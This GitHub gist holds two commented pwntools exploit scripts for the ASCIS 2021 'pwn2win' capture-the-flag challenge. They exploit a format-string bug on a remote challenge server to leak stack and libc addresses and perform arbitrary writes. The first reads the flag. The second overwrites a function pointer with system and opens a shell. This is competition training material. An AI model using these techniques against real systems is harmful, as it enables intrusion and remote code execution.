@kungfulon
Last active October 17, 2021 01:49
ASCIS 2021 Qualification Round - pwn2win
#!/usr/bin/env python3
from pwn import *
context.clear(arch='amd64', os='linux', endian='little')
r = remote('125.235.240.166', 33333)

# 1st boss. The first line sent is the player name; a bare '%p' makes the
# server print one pointer back on its 'WINNER: ' line (the name is apparently
# passed straight to a printf-style function).
r.sendline(b'%p')

# Menu exchange for the six rounds of the first boss: option 2, then a fixed
# large amount (0x11111111 == 286331153, sent as decimal text).
menu_choice = b'2'
amount = str(0x11111111).encode('ascii')
for _ in range(6):
    r.sendlineafter(b'> ', menu_choice)
    r.sendline(amount)

# Parse the leaked pointer and shift it by the author's measured offset so the
# later stack-slot arithmetic (stack - 0x30, stack - 0x70, ...) has its reference.
r.recvuntil(b'WINNER: ')
leaked = int(r.recvline(), 16)
stack = leaked + 0x2720
log.info(f'stack = {stack:#x}')
def fight(fmt):
    """Play one boss round, sending *fmt* as the round's text input.

    Answers the ``(y/n) `` prompt with ``y``, sends *fmt* (ASCII-encoded) on the
    next line, then repeats the same menu exchange used for the first boss eight
    times: option ``2`` followed by the decimal amount 0x11111111.  Returns
    nothing; all effects are on the remote connection ``r``.
    """
    r.sendlineafter(b'(y/n) ', b'y')
    r.sendline(fmt.encode('ascii'))
    menu_choice = b'2'
    amount = str(0x11111111).encode('ascii')
    for _ in range(8):
        r.sendlineafter(b'> ', menu_choice)
        r.sendline(amount)
# 2nd boss: retarget the pointer that %25$ writes through so that its low
# 16 bits equal (stack - 0x70 + 3) & 0xffff.  Only the low half is written
# (hn), so the target must already lie in the same 64 KiB region.
target_low16 = (stack - 0x70 + 3) & 0xffff
fight(f'%{target_low16:d}c%25$hn')

# 3rd boss: write a single byte 0x80 (128 characters printed, then %hhn)
# through %53$, i.e. into the byte the previous round pointed at.
fight('%128c%53$hhn')
# loop variable has been set to a negative number
# now we have unlimited tries
def write(addr, value):
    """Store the low 16 bits of *value* at *addr* using nine ``fight`` rounds.

    The loop builds the full 8-byte *addr* two bytes at a time: each iteration
    first points the ``%25$`` write at ``stack - 0x30 + j`` (low 16 bits only),
    then writes the current low half of *addr* through ``%53$hn``.  Presumably
    the slot at ``stack - 0x30`` is what ``%16$`` dereferences, because the final
    round writes ``value & 0xffff`` through ``%16$hn``.  Only 16 bits of *value*
    are ever written; higher bits are ignored.  *addr* is consumed (shifted)
    inside the loop.
    """
    log.info('Writing 0x%x to 0x%x', value, addr)
    for j in range(0, 8, 2):
        # Retarget %25$ at the j-th 2-byte half of the 8-byte slot at stack - 0x30.
        fight('%{:d}c%25$hn'.format((stack - 0x30 + j) & 0xffff))
        # A zero half cannot be produced with '%0c' (that still prints one
        # character), so a bare %hn is used to write 0.
        if (addr & 0xffff) == 0:
            fight('%53$hn')
        else:
            fight('%{:d}c%53$hn'.format(addr & 0xffff))
        addr = addr >> 16
    # Same zero-count special case for the value write.
    value = value & 0xffff
    if value == 0:
        fight('%16$hn')
    else:
        fight('%{:d}c%16$hn'.format(value))
# Place the bytes "./flag" at 0x602098 + 7 .. + 12, two bytes per write()
# (u16 turns each 2-byte chunk into the 16-bit value write() stores).
for offset, chunk in ((7, b'./'), (9, b'fl'), (11, b'ag')):
    write(0x602098 + offset, u16(chunk))

# Zero the 16-bit stack variable at stack - 0x74.
write(stack - 0x74, 0)

# Accept one more prompt and print whatever the server echoes after 'Name: '
# (expected to be the contents of the overwritten buffer, i.e. the flag).
r.sendlineafter(b'(y/n) ', b'y')
r.recvuntil(b'Name: ')
answer = r.recvline().decode('ascii').strip()
log.success(answer)
#!/usr/bin/env python3
from pwn import *
context.clear(arch='amd64', os='linux', endian='little')
libc = ELF('./libc-2.31.so')
r = remote('125.235.240.166', 33333)

# The player name is echoed through a printf-style call: '%p' leaks one
# pointer (used as the stack reference) and '%23$p' leaks the 23rd argument,
# which the rebase below treats as __libc_start_main + 0xf3.
r.sendline(b'%p\n%23$p')

# Six rounds of the first boss: option 2 plus a fixed decimal amount.
menu_choice = b'2'
amount = str(0x11111111).encode('ascii')
for _ in range(6):
    r.sendlineafter(b'> ', menu_choice)
    r.sendline(amount)

r.recvuntil(b'WINNER: ')
stack = int(r.recvline(), 16) + 0x2720
log.info(f'stack = {stack:#x}')

# Second leaked line -> libc base (offset 0xf3 past __libc_start_main is the
# author's measured return-address offset for libc-2.31).
libc_leak = int(r.recvline(), 16)
libc.address = libc_leak - (libc.symbols['__libc_start_main'] + 0xf3)
log.info(f'libc = {libc.address:#x}')
def fight(fmt):
    """Play one boss round with *fmt* as the round's text input.

    Confirms the ``(y/n) `` prompt, sends *fmt* ASCII-encoded, then performs
    the menu exchange eight times (option ``2``, then the decimal amount
    0x11111111).  No return value; everything happens on connection ``r``.
    """
    r.sendlineafter(b'(y/n) ', b'y')
    r.sendline(fmt.encode('ascii'))
    menu_choice, amount = b'2', str(0x11111111).encode('ascii')
    rounds_left = 8
    while rounds_left:
        r.sendlineafter(b'> ', menu_choice)
        r.sendline(amount)
        rounds_left -= 1
def write_stack_near(addr, value, width='hn'):
    """Write ``value & 0xffff`` to *addr* in two ``fight`` rounds.

    Round one (``%25$hn``) sets the low 16 bits of the pointer that ``%53$``
    later dereferences to ``addr & 0xffff``; only those 16 bits are changed,
    so *addr* has to lie in the same 64 KiB region as that pointer (hence the
    name: it is meant for slots near ``stack``).  Round two writes *value*
    through ``%53$`` with the given *width* conversion (``'hn'`` = 2 bytes,
    ``'hhn'`` = 1 byte).  *value* is masked to 16 bits before logging, so with
    ``'hhn'`` only its low byte lands.
    """
    value = value & 0xffff
    log.info('Writing 0x%x to 0x%x', value, addr)
    # '%0c' would still print one character, so a bare conversion is used for 0.
    if (addr & 0xffff) == 0:
        fight('%25$hn')
    else:
        fight('%{:d}c%25$hn'.format(addr & 0xffff))
    if value == 0:
        fight('%53$' + width)
    else:
        fight('%{:d}c%53${}'.format(value, width))
def write(addr, value):
    """Write the byte string *value* to *addr*, two bytes per chunk.

    First the upper three 16-bit halves of *addr* (bits 16..63) are stored into
    the slot at ``stack - 0x30 + 2/4/6`` via ``write_stack_near``; presumably
    that 8-byte slot is what ``%16$`` dereferences.  For every 2-byte chunk of
    *value* the low half of the slot is then retargeted to ``addr + i`` and the
    chunk (as a little-endian 16-bit value) is written through ``%16$hn``.
    *value* must have even length: ``u16`` needs exactly two bytes.
    """
    for j in range(2, 8, 2):
        # write_stack_near masks to 16 bits, so this stores bits [8*j, 8*j+16).
        write_stack_near(stack - 0x30 + j, addr >> (8 * j))
    for i in range(0, len(value), 2):
        # Low half of the pointer slot := low half of the chunk's destination.
        write_stack_near(stack - 0x30, addr + i)
        val = u16(value[i:i+2])
        # Bare %hn for a zero chunk ('%0c' would still print one character).
        if val == 0:
            fight('%16$hn')
        else:
            fight('%{:d}c%16$hn'.format(val))
# Set the 16-bit word at stack - 0x70 + 2 to 0x8000 (sign bit of the word),
# which per the author's note turns the round counter negative.
write_stack_near(stack - 0x70 + 2, 0x8000)
# loop variable has been set to a negative number
# now we have unlimited tries

# Targets used once the round limit is gone (addresses are the author's;
# 0x602070 is presumably a GOT/function-pointer slot, 0x602098 + 7 the
# same string buffer the first script wrote "./flag" into).
system_ptr = p64(libc.symbols['system'])
shell_cmd = b'/bin/sh\x00'
write(0x602070, system_ptr)
write(0x602098 + 7, shell_cmd)

# Zero the 16-bit variable at stack - 0x74, confirm one more prompt and hand
# the connection to the user.
write_stack_near(stack - 0x74, 0)
r.sendlineafter(b'(y/n) ', b'y')
r.interactive()